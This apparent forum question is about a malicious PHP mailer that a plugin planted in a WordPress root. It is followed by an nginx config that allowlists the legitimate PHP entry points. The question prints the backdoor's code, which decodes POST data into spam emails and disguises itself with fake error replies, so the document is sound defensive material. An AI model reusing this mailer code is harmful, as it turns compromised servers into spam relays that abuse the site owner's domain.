WordPress: disable direct access to files in the WordPress installation path


I want to add a security feature to my WordPress website to stop direct access to files added to the root of the WordPress installation. Recently I discovered that a malicious plugin had added some files to send email. Below is the malicious PHP code that was added.



    // $method is not defined in the snippet as posted; the part of the file
    // that set it was not included in the question.
    switch ($method) {
      case 'GET':
        // GET requests get a fake "404" string (there is no break, so
        // execution falls through into the POST branch as well)
        echo '###ERROR 404';
      case 'POST':
        // Every POST parameter is treated as one outgoing email
        foreach ($_POST as $key => $x_value) {

          // Value is base64-encoded and '|'-separated:
          // recipient|subject|body|sender name|sender address|raw headers
          $data    = base64_decode($x_value);
          $to_data = explode('|', $data);

          $to         = $to_data[0];
          $x_subject  = $to_data[1];
          $x_body     = $to_data[2];
          $from_user  = $to_data[3];
          $from_email = $to_data[4];
          $header     = $to_data[5];

          // Sends through the server's local mailer, so the message leaves
          // from this domain; the "403"/"404" replies are deliberately
          // misleading so the file looks like an error page in logs
          $jfnbrsjfq = mail($to, $x_subject, $x_body, $header);
          if ($jfnbrsjfq) { echo 'error 403'; } else { echo 'error 404 : ' . $jfnbrsjfq; }

        } // end foreach  (closing braces were cut off in the post)
    }     // end switch


In this case the hacker would pass some parameters to send emails from my domain using this code.

I thought there might be a way to disable direct access to these files, so they cannot be used to send email or for any other malicious activity. Is there a way to restrict this using nginx? What is the best approach to deal with this case? I would appreciate any useful input.

kikuyu1 5 months 2020-12-22T06:10:26-05:00 0 Answers 6 views 0
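One nginx-side answer to the question above, added here as an example and not taken from the post: instead of letting every `.php` file under the web root reach PHP-FPM, allowlist the WordPress entry points that legitimately need to execute and return 403 for everything else, so a mailer dropped into the installation root is never run. The paths `/var/www/html`, `example.com` and the PHP-FPM socket `/run/php/php-fpm.sock` are assumptions; adjust them to your server.

```nginx
# Added example, not part of the original question. Assumes WordPress is
# installed at /var/www/html and PHP-FPM listens on /run/php/php-fpm.sock.
server {
    listen 80;
    server_name example.com;            # placeholder hostname
    root /var/www/html;
    index index.php;

    # 1. Directories that must never execute PHP, no matter what is dropped
    #    there. Regex locations are matched in the order they appear, so
    #    these must come before the allowlist below.
    location ~* ^/wp-content/uploads/.*\.php$ { return 403; }
    location ~* ^/wp-includes/.*\.php$       { return 403; }

    # 2. The only top-level PHP files WordPress needs to serve directly.
    #    Drop xmlrpc.php from the list if you do not use XML-RPC.
    location ~ ^/(index|wp-login|wp-cron|xmlrpc|wp-comments-post)\.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;
    }

    # 3. The admin area (includes admin-ajax.php, which plugins rely on).
    location ~ ^/wp-admin/.*\.php$ {
        include fastcgi_params;
        fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        fastcgi_pass unix:/run/php/php-fpm.sock;
    }

    # 4. Any other .php file (for example a mailer added to the web root)
    #    is refused outright: not executed, and not served as source either.
    location ~ \.php$ { return 403; }

    # Pretty permalinks: everything else is routed through index.php.
    location / {
        try_files $uri $uri/ /index.php?$args;
    }
}
```

Before deploying, test with `nginx -t` and then exercise the site, because a few plugins expect to call their own PHP files directly from `wp-content/plugins`; if one does, add that specific path as its own allowed location rather than relaxing the catch-all. This restriction only stops the dropped file from being reached over HTTP: the file itself still has to be deleted, the plugin that planted it removed, and the site checked for other changes, since a script can also be pulled in by `include` from a file that is allowed to run.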
